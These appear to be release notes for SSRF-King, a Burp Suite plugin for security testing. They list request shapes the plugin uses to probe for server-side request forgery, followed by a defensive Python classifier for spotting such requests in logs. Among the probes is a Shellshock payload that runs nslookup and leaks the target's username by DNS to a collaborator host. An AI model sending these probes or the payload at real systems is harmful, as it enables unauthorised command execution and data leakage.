Releases: ethicalhackingplayground/ssrf-king
SSRF-King v1.12
I have released v1.12, which has a small UI design where you can specify your own callback payload.
Changes:
- Implemented checkbox for http:// and https://
- Plugin now uses JDK 14 with code compliance 9, which should work with all versions; let me know if it doesn't.
Bug fixes:
- Fixed parameter testing.
- When it reported an X-Forwarded-Host, it came up as X-Forwarded-For.
- The test cases for the following are now fixed and work:
GET http://burpcollab/some/endpoint HTTP/1.1
Host: example.com
...
and
GET @burpcollab/some/endpoint HTTP/1.1
Host: example.com
...
SSRF-King v1.1
I've implemented some more features.
- Detects SSRF in the User-Agent Header
- Detects SSRF in the Referer Header
- Detects SSRF in the X-Forwarded-For Header
- Detects SSRF in the Host Header
It tries different ways to find SSRF, such as:
GET http://burpcollab/some/endpoint HTTP/1.1
Host: example.com
...
or
GET @burpcollab/some/endpoint HTTP/1.1
Host: example.com
...
or
GET /some/endpoint HTTP/1.1
Host: example.com:80@burpcollab
...
or changing the host header
GET /some/endpoint HTTP/1.1
Host: burpcollab
...
or overriding the sites
GET /some/endpoint HTTP/1.1
Host: example.com
X-Forwarded-Host: burpcollab
...
or referer
GET /some/endpoint HTTP/1.1
Host: example.com
Referer: burpcollab
...
or blind SSRF with shellshock exploitation
GET /some/endpoint HTTP/1.1
Host: example.com
User-Agent: burpcollab
...
Payload would be like: () { :; }; /usr/bin/nslookup $(whoami).YOUR-SUBDOMAIN-HERE.burpcollaborator.net
Reference:
https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface
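For defenders reviewing proxy or WAF logs, the request shapes listed above can be recognised with a small classifier. This is an added example, not code from the SSRF-King plugin; the function names, finding labels, the `allowed_hosts` parameter and the `collab.example.net` placeholder host are assumptions made for illustration.

```python
import re

SHELLSHOCK = re.compile(r"\(\)\s*\{")  # "() {" prefix that starts a Shellshock payload

def parse_request(raw):
    """Split a raw HTTP/1.1 request head into (method, target, headers)."""
    lines = raw.strip().splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers

def hostname(authority):
    """Drop any userinfo and port from an authority string."""
    return authority.rsplit("@", 1)[-1].split(":")[0].lower()

def classify(raw, allowed_hosts):
    """Return which of the probe shapes listed above a request matches."""
    _method, target, headers = parse_request(raw)
    findings = []
    host = headers.get("host", "")
    if re.match(r"(?i)https?://", target):
        if hostname(target.split("//", 1)[1].split("/", 1)[0]) not in allowed_hosts:
            findings.append("absolute-uri-foreign-host")
    elif not target.startswith("/") and target != "*":
        findings.append("non-origin-form-target")  # e.g. "@host/path"
    if "@" in host:
        findings.append("userinfo-in-host")
    elif hostname(host) not in allowed_hosts:
        findings.append("unknown-host-header")
    xfh = headers.get("x-forwarded-host")
    if xfh and hostname(xfh) not in allowed_hosts:
        findings.append("foreign-x-forwarded-host")
    if any(SHELLSHOCK.search(v) for v in headers.values()):
        findings.append("shellshock-pattern")
    return findings

# Constructed sample requests; collab.example.net is a placeholder callback host.
SAMPLES = [
    "GET http://collab.example.net/some/endpoint HTTP/1.1\r\nHost: example.com\r\n\r\n",
    "GET /some/endpoint HTTP/1.1\r\nHost: example.com:80@collab.example.net\r\n\r\n",
    "GET /some/endpoint HTTP/1.1\r\nHost: example.com\r\n\r\n",
]

if __name__ == "__main__":
    for raw in SAMPLES:
        print(classify(raw, {"example.com"}), "<-", raw.splitlines()[0])
```

CONNECT requests use authority-form targets and would need their own branch; a Referer naming another site is normal traffic, so it is not flagged here.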
SSRF-King v1.0
This is the first release of SSRF-King. Please let me know if you have any issues.